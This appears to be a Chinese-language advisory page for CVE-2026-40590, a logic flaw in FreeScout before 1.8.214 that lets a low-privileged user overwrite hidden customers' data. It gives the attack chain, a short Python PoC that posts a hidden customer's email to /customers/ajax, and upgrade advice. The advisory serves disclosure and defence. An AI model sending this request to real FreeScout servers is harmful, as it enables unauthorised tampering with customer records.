CVE-2026-40590 CVSS 4.3 中危

CVE-2026-40590 FreeScout隐藏客户信息篡改漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40590

漏洞类型

逻辑漏洞

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FreeScout

漏洞概述

FreeScout在1.8.214版本前存在逻辑漏洞，攻击者可绕过邮箱唯一性校验，通过复用隐藏客户对象来篡改其信息。

技术细节

漏洞位于FreeScout的“更改客户”功能中，具体接口为POST /customers/ajax（action=create）。在特定可见性条件下，系统丢弃了邮箱唯一性验证机制。攻击者利用此缺陷，提交一个已归属于“隐藏客户”的邮箱地址。由于验证失效，后端Customer::create()方法会直接复用该隐藏客户对象，并将请求中攻击者可控的输入填充到对象的空配置字段中。这一逻辑缺陷允许攻击者篡改隐藏客户的资料，可能导致信息泄露或权限提升。

攻击链分析

STEP 1

侦察

攻击者识别系统中属于隐藏客户的电子邮箱地址。

STEP 2

利用

向 /customers/ajax 发送 POST 请求，action 为 create，邮箱字段填入隐藏客户的邮箱。

STEP 3

绕过验证

系统因逻辑缺陷跳过邮箱唯一性校验，定位到对应的隐藏客户对象。

STEP 4

篡改数据

Customer::create() 复用该对象，并用攻击者提供的参数更新对象的空字段。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests url = "https://target.com/customers/ajax" # Payload to create/update a customer with an email belonging to a hidden user data = { "action": "create", "email": "[email protected]", # Email of an existing hidden customer "first_name": "Attacker", "last_name": "Controlled" } response = requests.post(url, data=data) if response.status_code == 200: print("[+] Potential exploit successful, check response.") else: print("[-] Exploit failed.")

影响范围

FreeScout < 1.8.214

防御指南

临时缓解措施

建议用户立即升级到官方修复版本1.8.214。在无法立即升级的情况下，应严格监控后台客户变更日志，特别是针对隐藏客户资料的修改记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表